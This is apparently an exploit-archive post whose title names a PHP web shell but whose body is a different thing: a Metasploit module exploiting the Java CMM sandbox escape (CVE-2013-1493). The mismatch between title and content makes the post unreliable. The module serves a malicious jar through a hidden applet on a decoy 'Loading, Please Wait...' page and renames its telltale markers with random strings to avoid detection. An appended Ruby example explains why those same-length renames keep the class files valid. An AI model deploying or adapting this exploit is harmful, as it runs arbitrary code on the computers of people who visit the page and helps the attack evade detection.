STUNSHELL PHP Web Shell Remote Code Execution

Posted 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  # No JavaScript is needed on the client side; the applet tag alone triggers it.
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # The exploit's precompiled Java classes ship in the framework's data directory.
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    # Rename the entry class with a random name of the same length so that the
    # class-file constant pool keeps consistent string lengths.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Same-length substitution of the well-known markers in entry names and bytes.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
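Added example, not part of the forum post or the Metasploit module above. It shows why the module renames "Init", "metasploit" and "Payload" with random strings of exactly the same length (rand_text_alpha("metasploit".length)). Java class files store strings in the constant pool as CONSTANT_Utf8 entries: a tag byte 0x01, a big-endian u2 byte length, then the bytes. The module does a blind gsub over the raw class bytes without touching those length fields, so the file only stays parseable when each replacement has the same byte length as the marker it replaces. The "pool" below is a constructed, simplified sequence of CONSTANT_Utf8 entries only (a real pool has a leading count and many other tags); rand_alpha stands in for the framework's rand_text_alpha.

```ruby
# Added example (not from the post or the Metasploit module): why the marker
# rewriting in the module must preserve string length. A constructed, simplified
# constant pool is rewritten both ways and then checked for length consistency.

require 'securerandom'

CONSTANT_UTF8 = 1

# One CONSTANT_Utf8 entry: tag byte, big-endian u2 length, raw bytes.
def utf8_entry(str)
  [CONSTANT_UTF8, str.bytesize].pack('Cn') + str.b
end

# Constructed sample pool made of CONSTANT_Utf8 entries only (assumption:
# no count prefix and no other tags, unlike a real class file).
def build_pool(strings)
  strings.map { |s| utf8_entry(s) }.join.b
end

# Decode the pool, checking every declared length against the bytes present.
# Returns the list of strings, or nil when a tag is wrong or a length overruns
# the buffer, which is what a length-changing rewrite produces.
def parse_pool(pool)
  out = []
  i = 0
  while i < pool.bytesize
    return nil unless pool.getbyte(i) == CONSTANT_UTF8
    return nil if i + 3 > pool.bytesize
    len = pool.byteslice(i + 1, 2).unpack1('n')
    return nil if i + 3 + len > pool.bytesize
    out << pool.byteslice(i + 3, len)
    i += 3 + len
  end
  out
end

# Same-length random alpha string, standing in for rand_text_alpha(len).
def rand_alpha(len)
  chars = ('a'..'z').to_a + ('A'..'Z').to_a
  Array.new(len) { chars[SecureRandom.random_number(chars.size)] }.join
end

# The module's rewrite: a literal gsub over raw bytes, length fields untouched.
def rewrite_marker(bytes, marker, replacement)
  bytes.b.gsub(marker.b, replacement.b)
end

# Replace each marker with a same-length random string, as the module does.
# Returns [rewritten_pool, parsed_strings_or_nil].
def randomize_pool(pool, markers)
  rewritten = pool
  markers.each { |m| rewritten = rewrite_marker(rewritten, m, rand_alpha(m.length)) }
  [rewritten, parse_pool(rewritten)]
end

if __FILE__ == $0
  pool = build_pool(["metasploit/Payload", "java/lang/Object"])
  _same, parsed = randomize_pool(pool, ["metasploit", "Payload"])
  puts "same-length rewrite still parses: #{!parsed.nil?} #{parsed.inspect}"
  shorter = rewrite_marker(pool, "metasploit", "x")
  puts "length-changing rewrite still parses: #{!parse_pool(shorter).nil?}"
end
```

The same-length rewrite keeps every u2 length field accurate, so the rewritten bytes still decode and no entry contains the original markers; replacing "metasploit" with a shorter string leaves a stale length that swallows the next entry's tag, and the parse fails. The same reasoning applies to the renamed .class entry names inside the jar, which is why the module derives each replacement length from the marker it replaces.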